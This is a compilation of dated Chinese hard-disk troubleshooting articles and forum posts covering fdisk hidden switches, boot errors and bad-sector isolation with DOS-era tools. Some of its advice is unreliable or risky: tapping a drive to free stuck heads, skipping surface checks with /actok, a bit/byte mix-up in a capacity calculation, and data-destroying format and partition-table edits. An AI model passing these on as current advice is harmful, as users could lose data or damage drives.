    问题二：硬盘有坏区，每次进行分区时，不能通过硬盘检测，导致无法正常分区。

    解决方法：此问题最为讨厌，明明只坏了一点硬盘，却使整个硬盘无法使用，甚至整个计算机都闲置，造成资源浪费，每次看见自己的“爱机”就想踹两脚，难受之至。不用发愁，解决方法依然很简单，输入fdisk /actok命令后回车试试，是否一切顺利过关，你的“爱机”从此又可以活蹦乱跳了，兴奋吧！其实这就是fdisk命令的隐藏参数/actok的功能，它可以在硬盘分区时不检测磁盘表面是否有坏区，直接进行分区，既解决问题又加快分区速度，真是事半功倍。

    另外，用户每次分完区后，都必须重新启动计算机，非常不方便，大家可以加 /q 参数，这样每次分区结束后，不用重新启动计算机，直接格式化硬盘，安装操作系统即可。以上是我在实际操作中的一些体会技巧，希望和大家一起分享。


硬盘分区技巧二则

《一键清理系统垃圾》

硬盘分区技巧二则

《中国电脑教育报》张新奎

    硬盘分区是每一个计算机爱好者都非常熟悉的基本技能，大家对fdisk更是“了如指掌”，其实不然，fdisk命令还有好多功能我们还不知道，还有一些隐藏参数不为人知，以下就利用fdisk命令的隐藏参数解决两个常见的硬盘分区中的问题。

    案例一：硬盘分区时，既要有FAT16格式又要有FAT32格式，或者硬盘只认FAT16格式，从而不能安装Windows 98操作系统等等。

    技巧：通常状况下，大家是通过各种分区软件进行格式转换，以求满足用户的需要。这种方法操作复杂，而且分区软件并不是随处都有，非常不方便。在这里，我们在拥有一张启动盘的前提下给大家介绍一种极其简单的办法，既方便又实用，那就是利用fdisk的一个实用参数/fprmt，此参数的功能是在交互模式下询问FAT16格式和FAT32格式的使用。当用户输入fdisk /fprmt命令回车后，硬盘分区时不会出现是否支持大容量硬盘的询问画面，而是在每次建立一个分区时询问使用FAT16格式还是FAT32格式。非常方便吧。

    案例二：硬盘有坏区，每次进行分区时，不能通过硬盘检测，导致无法正常分区。

    技巧：此问题最为讨厌，明明只坏了一点硬盘，却使整个硬盘无法使用，甚至整个计算机都闲置，造成资源浪费，每次看见自己的“爱机”就想踹两脚，难受之至。不用发愁，解决方法依然很简单，输入fdisk /actok命令后回车试试是否一切顺利过关。走运的话，你的“爱机”从此又可以活蹦乱跳了，兴奋吧！其实这就是fdisk命令的隐藏参数/actok的功能，它可以在硬盘分区时不检测磁盘表面是否有坏区，直接进行分区，既解决问题又加快分区速度，真是事半功倍。

    另外，用户每次分完区后，都必须重新启动计算机，非常不方便，大家可以加 /q 参数，这样每次分区结束后，不用重新启动计算机，直接格式化硬盘，安装操作系统即可。


硬盘各部位常见故障汇总

《一键清理系统垃圾》

硬盘各部位常见故障汇总

1）硬盘的供电：硬盘的供电取自主机的开关电源，四个接线柱的电压分别为：红色为正5V，黑色为地线，黄色为正12V，通过线性电源变换电路，变换为硬盘正常工作的各种电压。硬盘的供电电路如果出现问题，会直接导致硬盘不能工作。故障现象往往表现为不通电、硬盘检测不到、盘片不转、磁头不寻道等。供电电路常出问题的部位是：插座的接线柱、滤波电容、二极管、三极管、场效应管、电感、保险电阻等。

2）接口：接口是硬盘与计算机之间传输数据的通路，接口电路如出现故障可能会导致硬盘检测不到、乱码、参数误认等现象。接口电路常出故障的部位是接口芯片或与之匹配的晶振坏、接口插针断或虚焊或脏污、接口排阻损坏，部分硬盘的接口塑料损坏导致厂家不予保修。

3）缓存：用于加快硬盘数据传输速度，如出现问题可能会导致硬盘不被识别、乱码、进入操作系统后异常死机等现象。

4）BIOS：用于保存与硬盘容量、接口信息等，硬盘所有的工作流程都与BIOS程序相关，通断电瞬间可能会导致BIOS程序丢失或紊乱。BIOS不正常会导致硬盘误认、不能识别等各种各样的故障现象。

5）磁头芯片：贴装在磁头组件上，用于放大磁头信号、磁头逻辑分配、处理音圈电机反馈信号等，该芯片出现问题可能会出现磁头不能正确寻道、数据不能写入盘片、不能识别硬盘、异响等故障现象。

6） 前置信号处理器：用于加工整理磁头芯片传来的数据信号，该芯片如出现问题可能会出现不能正确识别硬盘的故障现象。

7）数字信号处理器：用于处理前置信号处理器传过来的数据信号，并对该信号解码或接收计算机传过来的数据信号，并对该信号进行编码。

8）电机驱动芯片：用于驱动硬盘主轴电机和音圈电机。现在的硬盘由于转速太高导致该芯片发热量太大而损坏，据不完全统计，70% 左右的硬盘电路路障是由该芯片损坏引起。

9）盘片：用于存储硬盘数据，轻微划伤时可通过软件按一定的算法解码纠错，严重划伤时，数据不可恢复。

10）主轴电机：用于带动盘片高速旋转，现在的硬盘大多使用液态轴承马达，精度极高，剧烈碰撞后可能会使间隙变大，读取数据变得困难、异响或根本检测不到硬盘。该故障现象需用专用设备才能读取里面的数据。

11）磁头：用于读取或写入硬盘数据，受到剧烈碰撞时易于损坏，导致不认硬盘。硬盘受到碰撞后受损可能性更大的是磁头。

12）音圈电机：闭环控制电机，用于把磁头准确定位在磁道上。该电机较少损坏。

13）定位卡子：用于使磁头停留在启停区，IBM等系列的硬盘的卡子易错位，导致磁头不能正常寻道。在无开盘维修条件的情况下，可按一定的角度适当敲击硬盘，使卡子回复到正确位置。


硬盘故障篇

《一键清理系统垃圾》

硬盘故障篇

无法启动故障
    开机提示 missing ofperating system
分析/解决： 分区有效标志错误，有可能是IDE线松了！也可能是cmos 设置有错！可以试试用启动盘启动运行fdisk/mbr
   non-system disk or disk error
分析/解决：可能非法关机造成硬盘非正常读写，导致无法启动！最简单的办法是从dos启动用 sys c: 这样dos引导文件就可以修复。如果无效可以用fdisk /mbr 强制复制命令进行解决这问题！如果没效的话可能是分区表有错误用一个方法可以试试：用win2000。将受损的硬盘挂在上面开机后！因为2000会对新硬盘进行扫描的！让他自动扫描可以基本修复硬盘！

error loading operating system
分析/解决：一般是dos引导记录出错！这种情况可以用ndd修复如果不成功！只能用format c: /s 重写dos引导记录。。format 之后C盘数据将丢失。。其实你不用怕！因为可以用nu 中的nuformat 命令来恢复！
drive failure run setup utility
分析/解决：硬盘调协不正确，启动机子进入bios进{standard coms setup}对硬盘进行设置可解决！
no rom basic
分析/解决：没有设置活动分区引起的，可以动行fdisk 选择活动分区。
invalid drive specification
分析/解决：可能分区后没有格式化/没有分区/如果重新格式化/分区后没有KO的话可能是硬盘本身的问题！

--------------------------------------------------------------------------------
作者: 小俊　　时间: 2004-5-21 23:50　　 标题: 硬盘篇！！ 绝对一个一个字打进去的！！

cmos检测不到硬盘
分析/解决：如果是系统无法启动从A盘也不能启动到C盘的话。。用cmos也不能发现硬盘的存在。。这可能是IDE接口问题跟硬盘有问题的可能性不大。。可以重新接过IDE口试试。。如果新接上硬盘也不能检测到的话。。就可能是硬盘上的主从跳线问题了
disk boot failure
分析/解决：可能是电源/IDE口松了，可以试试重新接接看！也可能是跳线问题！
wait for disk ready
分析/解决：意思是等待硬盘！可能是硬盘跳线出错！更改跳线一般可以解决！
硬盘中招了，一启动就死！
分析/解决：用一个杀毒软件作一个启动盘。。用一个启动盘启动dos然后再运行杀毒盘的应用文件。。方法就是这样。。大家可以试试！
系统找不到硬盘
分析/解决：可能是病毒问题/如果将其挂到别的机子上也找不到的话/可能就是硬盘物理故障喽。。建议送到厂家。。
hard disk not present
分析/解决：comos硬盘设置不正确/硬盘控制和硬盘驱动器连接不正确。可以重新接好IDE口/进入bios设置，将硬盘检测和access mode都设成是auto 一般可以搞掂！
coms 检测硬盘小于实际容量
分析/解决：开机后进入bios设置更改access mode 建议auto
sector not found
分析/解决：硬盘扇区出了故障！在cmos中更改硬盘设置！每柱面扇区数为42/重新分区用nu软件中的ndd进行表面测试和修复
硬盘发出 噶噶声
分析/解决：可能硬盘上有一些死点卡住了。。可以更一条硬盘线，可能线老化所导成的/也可以试试轻轻打一下硬盘因为可能是有死点卡住的原因！

--------------------------------------------------------------------------------
作者: 小俊　　时间: 2004-5-21 23:52　　 标题: 硬盘篇！！ 绝对一个一个字打进去的！！

我所遇到常见的问题就是这么多啦。。因为时间问题想到的只有这些有什么问题大家可以跟贴！那些地方错了大家指正我哦。。谢谢！！


硬盘故障问答4例

《一键清理系统垃圾》

硬盘故障问答4例

  1、硬盘芯片过热导致死机

    问：我的电脑最近出了一个硬件问题，现象是电脑使用过程中突然黑屏，按键盘灯无反映死机或者蓝屏（蓝屏提示硬件故障），按复位键后显示器像没信号一样灯开始闪烁（偶尔能够重新启动但很少）。要关闭电源等几分钟才恢复正常，有的时候还不行，在其间摸过全部硬件都没有特别发热现象，温度都正常，硬盘重新又分过区也正常。但是我发现如果我把硬盘拿出机箱，把有电路的一面朝上放置就不会出现死机现象，关机后我摸硬盘的电路，发现一个芯片温度很烫手，请问死机现象是不是和硬盘电路有关系？

    答：根据你描述的现象，现在可以判定死机的原因的确是和硬盘的电路有关系。由于现在天气越来越热，高速运转的硬盘发热量是相当大的，如果不采取一些降温措施，的确会出现一些莫名其妙的死机现象。龙哥建议你采取一些有效的降温措施，例如给机箱上加装机箱风扇，加强机箱内部的空气流通，这样会使死机的现象缓解不少。不过提醒你注意的是，最好不要给硬盘上加装硬盘散热器，因为市面上售价20元左右的硬盘散热器效果虽然不错，但是由于做工的原因，震动是相当大的。如果硬盘长时间在震动的条件下工作，会减少硬盘的寿命。

    2、硬盘挂起问题

    问：我的机子在没有进行任何操作，当其闲置三分钟左右后，就能听到好似硬盘被挂起的声音，而后我在例如打开某个文件夹时，能听到硬盘起转的声音，感觉打开速度明显减慢，不知是什么问题，以前从没出现过这现象。请问这是什么原因，有没有方法能够解决？

    答：出现这样的问题很可能是由于您在电脑的“电源管理”选项中设置了三分钟后关闭硬盘，所以才会出现这样的问题。您现在可以通过以下的方法来解决这个问题：在“开始”菜单中选择“设置”->“控制面板”->“电源选项”，打开这项设置，然后把“关闭硬盘”一项设置为“从不”，然后点击“确定”即可。

    3、硬盘格式化后容量变小

    问：我新购买了一块80GB的硬盘，但是我在格式化后发现硬盘少了7．8GB的空间，请问一个80G的硬盘在格式化完后少了7．8GB的容量是否为正常吗？

    答：出现这样的问题是由于厂家和计算机系统之间的算法不同而造成的。

    厂家算法：80GB=1000bit×1000×1000×80=80，000，000，000bit

    系统算法：80，000，000，000bit=1024bit×1024×1024×72.2=72.2GB

    通过以上的两种算法的对比，您可以清楚地发现如果按照系统算法来计算的话，是会缺少7.8GB的。

    4、Ghost是否支持SCSI硬盘

    问：我最近安装了一块SCSI硬盘，安装的方法是采用PCI扩展卡的模式，启动时系统会自动认出卡的BIOS，然后引导硬盘。我现在想要使用Ghost对硬盘上的数据做镜像备份，请问Ghost是否支持SCSI硬盘？

    答：这一点您不用担心，Ghost是支持SCSI硬盘的，而且从6.0以上的版本，Ghost还可以支持NTFS的分区格式。


硬盘坏道的发现与修复

《一键清理系统垃圾》

硬盘坏道的发现与修复

   就算硬盘的日常使用与维护再好，都有可能产生坏道（其中的原因很多，比如：硬盘的质量问题等）。一旦硬盘出现了坏道，大家也不必惊慌，我把一些识别与修复硬盘坏道的方法告诉大家，帮助大家度过难关。
   硬盘的坏道共分两种：逻辑坏道和物理坏道。逻辑坏道为软坏道，大多是软件的操作和使用不当造成的，可以用软件进行修复；物理坏道为真正的物理性坏道，它表明硬盘的表面磁道上产生了物理损伤，大都无法用软件进行修复，只能通过改变硬盘分区或扇区的使用情况来解决。
   知道了硬盘产生坏道的原理，现在让我们来看看硬盘产生坏道的一般现象。
   在你打开、运行或拷贝某一文件、程序时，硬盘的操作速度变慢，长时间反复读盘，然后出错，或Windows提示“无法读取或无法写入文件”，严重时出现蓝屏等现象。
   硬盘读写的声音由原来的“嚓嚓”的摩擦声变为怪声。
   每次进入系统时都自动运行Scandisk进行硬盘扫描，或硬盘扫描时出现红色的“B”的标记。
   在排除病毒的情况下，电脑启动时无法从硬盘引导。自检时，屏幕提示“Hard disk drive failure”或“Hard drive controller failure”及类似信息。
   硬盘无法启动时，用软盘进行引导，出现“Sector not found”或“General error in reading drive C”等信息。还有就是可以转到硬盘所在盘符，但无法进入。
   格式化硬盘时，到某一进度停滞不前，最后报错退出。
   对硬盘用“Fdisk”命令进行分区时，到某一进度会反复进进退退，不能完成。
   如果你在日常对电脑的使用过程中，出现了上述情况或类似现象，那可要小心了，你的硬盘可能已经出现坏道！
   首先，我们先确认硬盘的坏道是逻辑坏道还是物理坏道，方法很简单。在电脑刚刚启动时，按“F8”键，选择“Command Prompt only”进入DOS模式（操作系统必须为Win95/98，若为Win2000/XP请使用DOS启动盘），执行“scandisk x:”（X为盘符），Scandisk程序便会检查硬盘，对产生的逻辑坏道会自行弹出对话框，选择“Fix it”对逻辑坏道进行初级修复。如扫描程序在某一进度停滞不前，那么硬盘就有了物理坏道。
   对于已进行初步修复的仍有逻辑坏道的硬盘，正常启动后回到Windows下，进入“我的电脑”中选择有逻辑坏道的硬盘，单击鼠标右键，选择“属性”→“工具”→“开始检查”就弹出“磁盘扫描程序”，选中“完全”并将“自动修复错误”打上勾（如图1），单击“开始”，就开始对该分区进行扫描和修复。
   而对于有物理坏道的硬盘，上述方法就无能为力了，但也不是没有办法。
   最简单的方法就是，如果硬盘还没过质保期，就去找销售商，让其想办法（别忘了带发票）。但如果过了质保期或遇到了奸商，就只好自己想办法了，下面我就介绍一种用“PartitionMagic”（分区魔术师，以下简称PM）修复硬盘的方法。
   道理很简单，通过对硬盘的重新分区，隐藏有物理坏道的硬盘空间，对其实行隔离。具体的作法是：首先启动PM，选中“Operations”菜单下的“Check”命令，对硬盘进行直接扫描，标记坏簇后，选中“Operations”菜单下的 “Advanced”→“bad sector retset”（如图2），最后把坏簇分成一个独立的分区，再通过“Hide partiton”命令将分区隐藏，至此大功告成。
   如果电脑启动时出现信息“TRACK 0 BAD,DISK UNUSABLE”，那么修复起来就比较麻烦，因为此信息说明硬盘的零磁道损坏了，一般出现这种情况，大多数人就把硬盘作报废处理。但并非绝对不能修复，原理十分简单，只要用1扇区代替0扇区就行了，下面让我们试试吧！
   这次请“DiskMan”来帮助我们，它是一款比较常用的硬盘工具，大家可以在华军软件园下载（bj.onlinedown.net）。下载后在纯DOS运行，在“硬盘”菜单中选中要修改的盘（一般为C盘），然后依次进入“工具”→“参数修改”→将“起始柱面”的值由“0”改为“1”，确定后保存退出。就可以对硬盘进行重新分区了。
   如果出现问题后上述方法均不奏效，那只好使用终极大法——低级格式化。这是笔者最不推荐使用的一种方法，因为低格会重新划分磁道和扇区、标准地址信息、设置交叉因子等信息，会对硬盘造成剧烈磨损，对于已存在物理坏道的硬盘更是雪上加霜，且低格会将所有的数据清空，更是一个不可逆的过程。因此不到万不得已，千万不要低格。常用的低格工具有DM万用版，LFORMAT等，均可在华军软件园下载。切记，低格后的硬盘一定要用 “FORMAT”进行高级格式化后才能使用。


硬盘坏道修复步步高

《一键清理系统垃圾》

硬盘坏道修复步步高

编者按：在计算机的配件中，最娇气也是用户最担心的恐怕就是硬盘了。硬盘如果出现故障，则意味着你的数据安全受到了严重威胁，这是大多数用户所无法容忍而又必须面对的残酷现实。在众多的硬盘故障中，坏道的出现以及分区表的破坏可能是最常见和最让用户头疼的问题了。如果你遇到了这些问题，你会采用什么样的方法解决呢？本文以及B5版的文章或许可以给你一些有用的建议。
    硬盘有坏道的表现
    硬盘使用久了就可能出现各种各样的问题，而硬盘“坏道”便是这其中最常见的问题。硬盘出现坏道除了硬盘本身质量以及老化的原因外，主要是平时在使用上不能善待硬盘，比如内存太少以致应用软件对硬盘频繁访问，对硬盘过分频繁地整理碎片，不适当的超频，电源质量不好，温度过高，防尘不良，震动等。
    硬盘坏道分为逻辑坏道和物理坏道两种，前者为软坏道，通常为软件操作或使用不当造成的，可用软件修复；后者为真正的物理性坏道，它表明你的硬盘磁道上产生了物理损伤，只能通过更改硬盘分区或扇区的使用情况来解决。如果你的硬盘一旦出现下列这些现象时，你就该注意硬盘是否已经出现了坏道：
    （1）在读取某一文件或运行某一程序时，硬盘反复读盘且出错，提示文件损坏等信息，或者要经过很长时间才能成功；有时甚至会出现蓝屏等；
    （2）硬盘声音突然由原来正常的摩擦音变成了怪音；
    （3）在排除病毒感染的情况下系统无法正常启动，出现“Sector not found”或“General error in reading drive C”等提示信息；
    （4）FORMAT硬盘时，到某一进度停止不前，最后报错，无法完成；
    （5）每次系统开机都会自动运行Scandisk扫描磁盘错误；
    （6）对硬盘执行FDISK时，到某一进度会反复进进退退；
    （7）启动时不能通过硬盘引导系统，用软盘启动后可以转到硬盘盘符，但无法进入，用SYS命令传导系统也不能成功。这种情况很有可能是硬盘的引导扇区出了问题。
    如果出现上述错误，你就需要加倍小心，这说明你的硬盘已经出现坏道了！
    硬盘坏道的修复
    1.修复逻辑坏道
    首先从最简单的方法入手。借助Windows下的磁盘扫描工具，在资源管理器中选中盘符后单击鼠标右键，在弹出的驱动器属性窗口中依次选择（如图1）（^41020201a^）“工具→开始检查”，将扫描类型设定为完全扫描，并选择自动修复错误，然后点击开始，扫描时间会因磁盘容量及扫描选项的不同而有所差异（如图2）（^41020201b^）。
    如果逻辑坏道存在于系统区导致无法正常启动，我们可以使用Windows 98/Me的启动盘，在DOS提示符下键入：Scandisk 盘符，按回车，一旦发现坏道，程序会提示你是否要Fix it（修复），选择Yes开始修复，许多因系统区出现逻辑坏道无法正常启动Windows的问题一般都可以用此方法解决。
    因为Windows 98/Me在很大程度上只是自动修复逻辑坏道，而不能自动修复物理坏道，所以，事实上第1种方法往往不能奏效。如果碰见物理坏道我们应该怎么办呢？
    2.用Scandisk检查物理坏道
    对于物理坏道Scandisk就无能为力了，它只能将其标记为坏道以后不再对这块区域进行读写操作，物理坏道具有“传染性”会向周边扩散，导致存储于坏道附近的数据也处于危险境地。
    用Scandisk时在查到坏道时停止，注意观察Scandisk停止时会数值，如22%，假设硬盘总容量为2GB，2GB×22%=0.44GB，硬盘出现坏道的起始位置大致为440MB处，由于硬盘坏道易向周边扩散，所以必须留足够的缓冲区，将硬盘第一个分区容量设定为400MB，其余1.6GB按200MB为单位分为8个区，使用Scandisk检查所有分区，将无法通过Scandisk检测的分区删除或隐藏，以确保系统不再读写这些区域。其余相邻的分区可合并后使用。分区、隐藏、删除、合并等操作可使用图形化界面的PartitionMagic或DiskMan等工具软件进行。
    3.用软件隐藏物理坏道
    用PartitionMagic5.0/6.0对硬盘进行处理。PartitionMagic可以在不破坏数据的情况下对硬盘重新分区、动态改变分区大小、改变分区的文件格式、隐藏或显示已有分区等等。将PartitionMagic5.0/6.0的DOS版拷在软盘上，用Windows 98/Me启动盘引导系统，运行软盘上的PQMAGIC.EXE。
    然后进行扫描硬盘，可以直接用PartitionMagic中Operations菜单下的“check”命令来完成，标记了坏簇后，可以尝试着对它进行重新测试，方法是在Operations菜单下选择“Advanced/badSector Retest”；把坏簇分成一个（或几个）区后，再通过HidePartition菜单项把含有坏道的分区隐藏，以免在Windows 98/Me中误操作。
    特别提示：如果没有经过格式化而直接将有坏道的分区隐藏的话，那么该分区的后续分区将由于驱动器盘符的变化而导致其中的一些与盘符有关的程序无法正确运行。解决的办法是利用Tools菜单下的DriveMapper菜单项，它会自动地收集快捷方式和注册表内的相关信息，立即更新应用程序中的驱动器盘符参数，以确保程序的正常运行。
    另外，也可以尝试用DiskMan做这些工作，在这里就不详细的介绍了。
    4.修复硬盘0扇区坏道
    对于硬盘0扇区损坏的情况，虽然比较棘手，但也不是无可救药，我们在这里给大家介绍两种方法。
    第一种方法：我们借用DiskMan这个软件来修复。具体方法如下：
    ①在纯DOS模式下运行DiskMan，在“硬盘”菜单中选择驱动器符号，这时主界面中显示该硬盘的分区格式为FAT32，起始柱面0，起始磁头1，总容量为2GB；
    ②然后依次进入“工具→参数修改”（或按F11），在弹出的修改分区对话框中，将起始柱面的值“0”改为“1”；
    ③按确定退回DM主界面并按F8保存修改结果。修改后需要重新格式化硬盘。（如图3）（^41020201c^）
    第二种方法：我们用部分人比较熟悉的Pctools9.0软件中的DE工具。具体方法如下：
    ①用Windows 98/Me启动盘启动，运行Pctools9.0目录下的DE.EXE，先进入Options菜单，选Configuration（配置），按空格去掉 Read Only（只读）前面的钩（按Tab键切换），保存退出；
    ②接着选主菜单Select（选择）中的Drive（驱动器）；
    ③进去后在Drive type（驱动器类型）项选Physical（物理的），按空格选定，再按Tall键切换到Drives项，选中 Hard disk（硬盘），然后选 OK回车；
    ④之后回到主菜单，打开Select菜单，这时会出现Partition Table（分区表），选中并进入，之后出现硬盘分区表信息；
    ⑤如果硬盘有两个分区，l分区就是C盘，该分区是从硬盘的0柱面开始的，那么，将1分区的Beginning Cylinder（起始柱面）的0改成1就可以了；
    ⑥保存后退出；
    ⑦重新启动，按Delete键进入COMS设置，选“IDE AUTO DETECT”，可以看到CYLS比原来减少了1，保存退出，重新分区，格式化，至此大功告成。
    提示：在修改之前先将硬盘上的重要资料备份出来，而且Pctools9.0不能在用FAT32分区的硬盘和Windows下运行，但可以在FAT16硬盘中运行。修复后一定要在CMOS中重新侦测硬盘，再分区和格式化，因为只有对硬盘作格式化后才会把分区表的信息写入1扇区（现在作为0扇区了）。
    5.低级格式化修复坏道
    上述所有办法都不能奏效，又不甘心硬盘就此报废，你就可以考虑使用低级格式化处理硬盘故障。但低级格式化会重新进行划分磁道和扇区、标注地址信息、设置交叉因子等操作，需要长时间读写硬盘，每使用一次就会对硬盘造成剧烈磨损，对于已经存在物理坏道的硬盘更是雪上加霜，实践证明低格将加速存在物理坏道的硬盘报废，而对于逻辑坏道，则根本无须使用低格程序作为修复手段。另外低格将彻底擦除硬盘中的所有数据，这一过程是不可逆的。因此低格只能在万不得已的情况下使用，低格后的硬盘要使用Format命令进行高级格式化后才能使用。


硬盘坏道修复全攻略

《一键清理系统垃圾》

硬盘坏道修复全攻略

    硬盘是电脑极重要的一部分，所有的资料和数据都会保存在硬盘中，一旦硬盘出现错误，有时数据的损失会比整个电脑报废的损失还要大。不过，作为电脑的硬件之一，许多人总以为硬盘轻易不容易损坏，一旦坏了就是不能启动的情况，还有人认为坏道是很容易识别的，发现了用什么磁盘医生之类的软件修理就行了，再不行就低格吧!其实硬盘坏道，几乎可以称为硬盘的致命伤。笔者见识过许多因为延误时机，自己乱用各种软件修理，最后把偌大个硬盘整成一块废铁的例子。

    修理硬盘坏道

    对于逻辑坏道，我们可以修复，对于物理坏道，我们应采用隔离的办法，以最大程度减少损失，防止坏道进一步扩散为目标。我见过有些人在报纸上吹说用某个特殊软件能修理物理坏道，最要命的是许多人对低格硬盘的迷信，实在是误人之语。所谓低级格式化，指的是将空白的磁盘划分出柱面和磁道，然后再将磁道划分为若干个扇区，每个扇区又划分出标识部分ID、间隔区GAP和数据区DATA等。低级格式化只能在DOS环境下完成，而且只能针对—块硬盘而不能支持单独的某一个分区。有些坏磁道和坏扇区能够通过低级格式化来修复，但对于真正的硬盘磁盘表面物理划伤则无法进行修复，这只有通过各种办法标出坏扇区的位置，以便让操作系统不去使用，以防止扩大坏道进而延长硬盘使用。特别想强调，低级格式化是一种损耗性操作，对硬盘的寿命有一定的负面影响，所以，如无必要，用户们尽量不要低级格式化硬盘。

    对于逻辑坏道，一般情况下我们用操作系统自带的工具和一些专门的硬盘检查工具就能发现并修复。如：Windows自带的Scandisk磁盘扫描程序就是发现硬盘逻辑坏道最常用的工具，而我们常见的Format命令不能对任何硬盘坏道起到修补作用，这点大家要明白。我们可在Windows系统环境下，在“我的电脑”中选中要处理的硬盘盘符，选择其“属性”，在出现的“工具”按钮中选择“查错状态”，再在“扫描类型”中选“全面检查”，并将“自动修复错误”打上“勾”，然后“开始”即可。如果系统在启动时不进行磁盘扫描或已不能进入Windows系统，我们也可用软盘或光盘启动盘启动电脑后，在相应的盘符下，如“A：”下运行Scandisk *：(注：*为要扫描的硬盘盘符)，回车后来对相应需要扫描修复的硬盘分区进行修理。

    但是，如果是硬盘物理坏道，那么千万千万记住不要试图用这些方法来修复，相反用各种工具反复扫描，就是对硬盘的物理坏区强制进行多次读写，必然会使坏道变多，进而扩散，正确的方法是用下面的方法果断地把已有坏道的地方隔离开。这是一种很无奈的办法，但是一个20G的硬盘，如果因为坏道，屏蔽了15G，总还有5G空间可用，如果不这样做，最后的结果是整个硬盘全部报废。

    方法一：用PartitionMagic等磁盘软件完成工作

    如PartitionMagic分区软件，先用PartitionMagic4中的“check”命令或Windows中的磁盘扫描程序来扫描磁盘，算出坏簇在硬盘上的位置，然后在Operation菜单下选择“Advanced/badSectorRetest”，把坏簇所在硬盘分成多个区后，再把坏簇所在的分区隐藏，以免在Windows中误操作，这个功能是通过HidePartition菜单项来实现的。这样也能保证有严重坏道的硬盘的正常使用，并免除系统频繁地去读写坏道从而扩展坏道的面积。但是这需要对这些软件熟悉，并且有计算硬盘的经验，许多人并不容易做到准确。

    方法二：用FDISK和格式化命令FORMAT

    具体的方法是这样的，第一要搞清硬盘的容量，对于有问题的磁盘先用FDISK分成一个C盘，再用FORMAT进行格式化，当碰到无法修复的坏块时面对FORMAT总是试图修复，这时记录下进行的百分比.然后按CTRL+BREAK强行终止任务，用磁盘总容量×百分比，得出这部分正常的磁盘容量，用FIDSK划出一个逻辑磁盘，再将后面的磁盘估计出坏道的大概大小，大概比例为10%左右，再划分一个逻辑盘。这个小盘不用格式化，在总工作完成后将其删除，这样就将坏块给全部跳过去了。这样可能会损失一些好道，但对大容量硬盘来说无足轻重，而硬盘使用起来更加稳定。

    方法三：用专门的坏盘分区工具如FBDISK

    FBDISK这是一个DOS下专门发现坏道并隔离后重新分区的软件，只有一个文件，仅仅几十K。操作很简单，先制作一张能启动到DOS的软盘，把FBDISK放在软盘上，用它引导系统，注意系统上只能挂一个要修理的硬盘，并且将其接在主硬盘的线上。进入DOS后，只要能发现硬盘，就运行FBDISK好了，这个小程序先会对硬盘按磁道进行扫描，发现坏道就显示出来，同时还会估计总体扫描完要用多长时间，全部扫描完后，程序会根据扫描结果和坏道情况给你提出一个全新的分区方案来，如果你接受就按Y，否则不会对你的硬盘进行处理。这个软件不错，但是可能比较大手，笔者曾有一次用它把一个10G硬盘扫完后，报告说只有300M可以使用，但是我用方法二后，却找出了近2G的完好空间。所以大家还是按需使用。

    还有一类特别的坏道表面看起来很可怕，其实反而好修理，如系统显示“TRACK 0 BAD，DISKUNUSABLE”，意思为“零磁道损坏，硬盘无法使用”或用磁盘扫描程序扫描其它硬盘时其0扇区出现红色“B”。大家都知道硬盘扇区是最重要的地方，损坏后一点也不能用，一般人往往将出现这样故障的硬盘作报废处理。其实合理运用一些磁盘软件，把报废的0扇区屏蔽掉，而用1扇区取而代之就能起到起死回生的效果，这样的软件如Pctools9.0和NU8等。

    以Pctools9.0为例来作说明。一块40G硬盘出现上述故障，用盘启动电脑后，运行Pctools9.0目录下的DE.EXE文件。接着选主菜单Select中的Drive，进去后在Drivetype项选Physical，按空格选定，再按Tab键切换到Drives项，选中harddisk，然后OK回车后回到主菜单。打开Select菜单，这时会出现PartitionTable，选中进入后出现硬盘分区表信息。该硬盘有两个分区，找到C区，该分区是从硬盘的0柱面开始的，那么，将1分区的BeginningCylinder的0改成1就可以了，保存后退出。重新启动电脑后按Del键进入COMS设置，运行“IDEAUTODETECT”，可以看到CYLS由782变成781。保存退出后重新分区格式化该硬盘就可以了。


硬盘坏道修复术

《一键清理系统垃圾》

硬盘坏道修复术

    计算机中最娇气的部件应该是硬盘了。虽然随着制造工艺的不断进步，这种情况有所转变，一些硬盘厂家如昆腾也发布了相关的新技术，比如昆腾七代开始使用的为减少硬盘受到的冲击力而开发的SPS震动防护系统，以此指望硬盘的身体“强健”起来。但硬盘易坏的缺点并没有得到根本的改变。对于喜欢追新的个人电脑用户来说，硬盘的更新频率一般没有CPU或显示卡那么快——即使要买新硬盘，老硬盘也要挂在机箱里发挥余热，所以人们特别不愿意看到硬盘出故障，尤其是硬盘中保存了珍贵的数据资料时。硬盘属逻辑损坏倒也罢了，大不了重装软件，但物理损坏呢？其实只要情况不是特别严重，用一些方法处理，一般也能解决问题。
    首先来看看硬盘有了物理损伤，也就是有了坏道后有哪些现象。
    1．读取某个文件或运行某个软件时经常出错，或者要经过很长时间才能操作成功，其间硬盘不断读盘并发出刺耳的杂音，这种现象意味着硬盘上载有数据的某些扇区已坏。
    2．开机时系统不能通过硬盘引导，软盘启动后可以转到硬盘盘符，但无法进入，用SYS命令传导系统也不能成功。这种情况比较严重，因为很有可能是硬盘的引导扇区出了问题。
    3．正常使用计算机时频繁无故出现蓝屏。
    对于前面3种情况，我们一般都有办法作或多或少地补救。以下提供了几种方法来对硬盘的坏道作修复，要注意的是，应该优先考虑排在前面的方法。
    1．首先从最简单的方法入手。在Windows98的资源管理器中选择硬盘盘符，右击鼠标，在快捷菜单中选择“属性”，在“工具”项中对硬盘盘面作完全扫描处理，并且对可能出现的坏簇作自动修正。对于以上第2种情况即不能进入Windows98的现象，则可以用Windows98的启动盘引导机器，然后在“A：>” 提示符后键入“scandisk X：” 来扫描硬盘，其中“X”是具体的硬盘盘符。对于坏簇，程序会以黑底红字的“B”（bad）标出。
    2．实际上，第1种方法往往不能奏效，因为Windows98对“坏道”的自动修复很大程度上是对逻辑坏道而言，而不能自动修复物理坏道，所以有必要考虑对这些坏道作“冷处理”。所谓“冷处理”就是在这些坏道上作标记，不去使用，惹不起还躲得起。记住第1种方法中坏道的位置，然后把硬盘高级格式化，将有坏道的区域划成一个区，以后就不要在这个区上存取文件了。要说明的是，不要为节约硬盘空间而把这个区划得过分“经济”，而应留有适当的余地，因为读取坏道周围的“好道”是不明智的——坏道具有蔓延性，如果动用与坏道靠得过分近的“好道”，那么过不了多久，硬盘上新的坏道又将出现。
